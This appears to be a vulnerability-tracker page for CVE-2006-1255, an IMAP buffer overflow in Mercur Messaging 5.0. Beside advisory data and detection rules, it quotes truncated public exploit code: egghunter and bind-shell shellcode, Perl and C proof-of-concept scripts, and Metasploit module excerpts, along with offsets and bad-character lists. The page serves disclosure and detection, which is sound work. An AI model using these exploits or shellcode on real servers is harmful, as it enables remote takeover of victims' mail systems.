CVE-2006-1255
published 2006-03-19CVE-2006-1255: Stack-based buffer overflow in the IMAP service in Mercur Messaging 5.0 SP3 and earlier allows remote attackers to cause a denial of service (application…
PriorityP351critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
68.15%
99.2th percentile
Stack-based buffer overflow in the IMAP service in Mercur Messaging 5.0 SP3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long string to the (1) LOGIN or (2) SELECT command, a different set of attack vectors and possibly a different vulnerability than CVE-2003-1177.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mercur | mercur_messaging | <= 2005_5.0_sp3 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
bytes↗
\x54\x30\x30\x57\x54\x30\x30\x57 (egg tag w00tW00t)
bytes↗
\x81\xc4\x54\xf2\xff\xff (PrependEncoder stack adjustment)
- →Detect oversized IMAP LOGIN command strings targeting Mercur IMAP on port 143; a LOGIN argument exceeding ~228 bytes (payload space) is anomalous and indicative of exploitation. ↗
- →Detect oversized IMAP SELECT command arguments (~251+ bytes) sent after successful authentication to Mercur IMAP service on port 143. ↗
- →Detect oversized IMAP LIST command arguments sent after authentication; exploit sends ~1000+ byte LIST argument containing NOP sleds and shellcode. ↗
- →Look for the egghunter tag bytes 0x54 0x30 0x30 0x57 (ASCII 'T00W') repeated twice in IMAP traffic as an indicator of egghunter-based exploitation of Mercur IMAP. ↗
- →Detect the stack-adjustment prepend encoder sequence \x81\xc4\x54\xf2\xff\xff in IMAP LOGIN payloads, used by the Metasploit module for this CVE. ↗
- →Monitor for outbound connections on port 4444 from the Mercur IMAP server process following receipt of a large IMAP command, indicating successful bind-shell payload execution. ↗
- →The Metasploit module uses EXITFUNC=thread and targets Windows 2000 SP4 and Windows XP SP2; correlate RET addresses 0x7c2ec68b and 0x77dc15c0 appearing in IMAP stream data. ↗
- ·Payload space in the LOGIN overflow is very limited (228 bytes); the Metasploit module recommends reverse ordinal payloads and uses an egghunter to locate a larger second-stage payload delivered via the LIST command. ↗
- ·Bad characters for the LOGIN overflow payload are \x00 \x20 \x2c \x3a \x40 (null, space, comma, colon, at-sign); encoders must avoid these bytes. ↗
- ·The SELECT overflow exploit requires a valid authenticated session before sending the oversized SELECT argument; unauthenticated exploitation is not possible for the SELECT vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2006-1255 Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)
Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)
---
##
# $Id: mercur_imap_select_overflow.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
'Description' => %q{
Mercur v5.0 IMAP server is prone to a remotely exploitable
stack-based buffer overflow vulnerability. This issue is due
to a failure of the application to properly bounds check
user-supplied data prior to copying it to a fixed size memory buffer.
Credit to Tim Taylor for discover t
Exploit-DB
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
exploitdb·2010-08-25
CVE-2006-1255 Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
---
##
# $Id: mercur_login.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.
Since the room for shellcode is small, using the reverse ordinal payloads
yields the best results.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10150 $',
'References' =>
[
[ 'CVE', '2006-125
Exploit-DB
Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)
exploitdb·2007-03-21
CVE-2006-1255 Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)
Mercur Messaging 2005
import os
import sys
import time
import socket
import struct
# Place our w00tw00t egghunter in nop heaven
shellcode = "\x90" * 92
shellcode +="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode +="\x90" * 100
# Place w00t and bindshell in correct place in LIST command.
bindshell = "\x90" * 320
bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x4
Exploit-DB
Mercur Messaging 2005 - IMAP Remote Buffer Overflow
exploitdb·2007-01-15
CVE-2006-1255 Mercur Messaging 2005 - IMAP Remote Buffer Overflow
Mercur Messaging 2005 - IMAP Remote Buffer Overflow
---
#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have an another valid account you must change the offsets this is only a poc
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";
my $nop = "\x90"x8;
my $nop1 = "\x90"x20;
my $ret = "\x42\xb2\xc1\x40";
#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe
my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";
# asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode
#
# 8BC7 MOV EAX,EDI
# 83C0 23 ADD EAX,23
# 50 PUSH EAX
# C3 RETN
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)b
Exploit-DB
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
exploitdb·2006-09-11
CVE-2006-1255 Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
---
#!/usr/bin/perl
# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
# Perl script based on Sami FTP server remote exploit by Critical Security
# https://www.securityfocus.com/bid/17138
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";
send $socket, $exploit, 0;
print "[+] sending 1st chunk\n";
$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";
send $socket, $exploit, 0;
print "[+] sending 2nd chunk\n";
print " + connecting port 4444 of $host
Exploit-DB
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)
exploitdb·2006-03-19
CVE-2006-1255 Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)
---
/*
* mercur.cpp
*
* Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
* Copyright (C) 2006 Javaphile Group
* http://www.javaphile.org
*
* Exploits code by : pll Ellison.Tang[at]gmail[dot]com
*
* Bug Reference:
* http://www.frsirt.com/bulletins/4332
*
*/
#include
#include
#include
#include
#pragma comment(lib, "ws2_32")
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout=150000;
if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
{
printf("[-]WSAStartup failed.\n");
exit(-1);
}
if((he=gethostbyname(ip))==0)
{
printf("[-]Failed to resolve '%s'.", ip);
exit(-1);
}
host.sin_port=htons(port);
host.sin_family=AF_INET;
host.sin_addr=*((st
Metasploit
Mercur Messaging 2005 IMAP Login Buffer Overflow
metasploit
Mercur Messaging 2005 IMAP Login Buffer Overflow
Mercur Messaging 2005 IMAP Login Buffer Overflow
This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.
Metasploit
Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
metasploit
Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discover the vulnerability.
No writeups or analysis indexed.
http://seclists.org/fulldisclosure/2006/Mar/1111http://seclists.org/fulldisclosure/2006/Mar/1167http://secunia.com/advisories/19267http://www.osvdb.org/23950http://www.securityfocus.com/bid/17138http://www.vupen.com/english/advisories/2006/0977https://exchange.xforce.ibmcloud.com/vulnerabilities/25290http://seclists.org/fulldisclosure/2006/Mar/1111http://seclists.org/fulldisclosure/2006/Mar/1167http://secunia.com/advisories/19267http://www.osvdb.org/23950http://www.securityfocus.com/bid/17138http://www.vupen.com/english/advisories/2006/0977https://exchange.xforce.ibmcloud.com/vulnerabilities/25290
2006-03-19
Published